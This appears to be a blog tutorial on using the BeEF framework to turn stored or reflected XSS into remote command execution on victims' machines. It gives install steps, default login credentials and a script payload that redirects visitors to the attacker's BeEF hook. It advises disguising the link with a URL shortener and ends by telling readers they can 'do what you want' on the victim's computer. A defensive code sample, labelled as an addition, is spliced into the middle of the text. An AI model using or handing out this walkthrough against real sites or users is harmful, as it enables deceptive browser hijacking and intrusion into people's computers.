Exploiting XSS for Full System Access: BeEF Exploitation Framework

Hi,

Today we will discuss how XSS can be exploited for full system access or for running commands on a victim's computer.

There are two main types of XSS: reflected and stored.

Stored XSS is where the XSS vector is stored permanently on the server, such as in a database or a message forum. The malicious script is then executed when a user retrieves the stored information.


Reflected XSS is where the injected script is reflected off the web server, such as in an error message or a search result. Reflected attacks are delivered to victims by some other route, such as in an e-mail message or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.
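Both types come down to the same server-side mistake: user input is written into the page as markup. The sketch below is an added example, not part of the original post, showing a search-result page that reflects its query unescaped next to a version that HTML-encodes it. All function names and the sample host are assumptions made for the illustration.

```javascript
// Added illustration; function names, markup and the sample host are hypothetical.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query is concatenated into the response as markup, so a
// <script> element in the query becomes a <script> element in the page.
function renderSearchVulnerable(query) {
  return `<p>No results for ${query}</p>`;
}

// Hardened: the query is encoded on output, so the browser displays it as text.
// The same encoding applies when rendering stored content (forum posts, etc.).
function renderSearchHardened(query) {
  return `<p>No results for ${escapeHtml(query)}</p>`;
}

// Defence in depth: without 'unsafe-inline', this policy makes the browser
// refuse inline <script> blocks even if an encoding bug slips through.
function securityHeaders() {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// True if the rendered HTML contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input in the shape of the redirect vector used in this post.
const SAMPLE_QUERY = '<script>window.location="http://hook.example.invalid/"</script>';

console.log("vulnerable page has <script>:", containsScriptTag(renderSearchVulnerable(SAMPLE_QUERY)));
console.log("hardened page has <script>:  ", containsScriptTag(renderSearchHardened(SAMPLE_QUERY)));
console.log(renderSearchHardened(SAMPLE_QUERY));
```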

Let's start exploiting it.

For the exploitation we will use a tool that comes with major Linux distributions, known as the BeEF exploitation framework.

If this tool is not currently installed on your system, run this command in a terminal to install it:

>>>sudo apt-get install beef

It will install in seconds, and then you are ready to exploit the XSS.
Now start the BeEF exploitation framework UI in your browser. You can simply type beef in your terminal to find out where the UI is located, but if you cannot do this you have an alternate option: the BeEF framework always works on port 3000, so just check your IP address with the command
>>> ifconfig

Copy the IP address and visit this link:
Your_Ip_address:3000/ui/panel


Now it will take you to the login panel of the BeEF framework. It will look like this:


The default username:password is beef:beef

Now log in and it will take you to this page:

Here, click where I have marked with a small arrow.
It will take you to a URL like this:
Your_ip_add:3000/demos/butcher/index.html

Copy this and create an XSS vector like this:
<script>window.location="YoUr_url"</script>

Now store this XSS vector, or, if you are exploiting reflected XSS, shorten the whole URL using any URL shortening service like bit.ly.


After the XSS is stored, or in the reflected case when the user clicks the XSS vector link, it will show you their IP address and a lot of information about their browser and PC, like this:







Now click on the command portion and you can run commands on the victim's computer.


Now you can do what you want.





Hope you enjoyed this post. If you have any suggestions please let me know;
feel free to comment.


Thanks 
Jitendra K Singh and Sooraj Shekhar



